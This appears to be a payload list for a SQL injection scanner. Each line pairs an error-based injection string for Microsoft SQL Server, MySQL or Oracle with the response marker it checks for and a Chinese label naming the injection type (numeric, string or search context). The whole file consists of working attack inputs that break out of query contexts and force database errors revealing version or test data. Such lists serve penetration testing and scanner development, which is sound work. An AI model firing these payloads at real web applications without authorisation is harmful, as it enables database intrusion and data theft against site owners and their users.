﻿ and (select @@version)=1:Microsoft SQL Server:SQLServer Bool And数字型错误显示注入:SQLServer
) and (select @@version)=1 (:Microsoft SQL Server:SQLServer Bool And数字型错误显示注入:SQLServer
' and (select @@version)=1 and 'a'='a:Microsoft SQL Server:SQLServer Bool And字符型错误显示注入:SQLServer
') and (select @@version)=1 and ('a'='a:Microsoft SQL Server:SQLServer Bool And字符型错误显示注入:SQLServer
%' and (select @@version)=1 and '%'=':Microsoft SQL Server:SQLServer Bool AND搜索型错误显示注入:SQLServer
%' and (select @@version)=1 and ''=':Microsoft SQL Server:SQLServer Bool AND搜索型错误显示注入:SQLServer
 and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a):injecttest:MySQL Bool And数字型错误显示注入:MySQL
) and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a) (:injecttest:MySQL Bool And数字型错误显示注入:MySQL
' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#:injecttest:MySQL Bool And字符型错误显示注入:MySQL
') and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#:injecttest:MySQL Bool And字符型错误显示注入:MySQL
%' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#:injecttest:MySQL BooL AND搜索型错误显示注入:MySQL
%' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#:injecttest:MySQL BooL AND搜索型错误显示注入:MySQL
 and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual):696E6A65637474657374:Oracle Bool And数字型错误显示注入:Oracle
) and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) (:696E6A65637474657374:Oracle Bool And数字型错误显示注入:Oracle
' and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and 'a'='a:696E6A65637474657374:Oracle Bool And字符型错误显示注入:Oracle
') and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and ('a'='a:696E6A65637474657374:Oracle Bool And字符型错误显示注入:Oracle
%' and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and '%'=':696E6A65637474657374:Oracle Bool AND搜索型错误显示注入:Oracle
%' and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and ''=':696E6A65637474657374:Oracle Bool AND搜索型错误显示注入:Oracle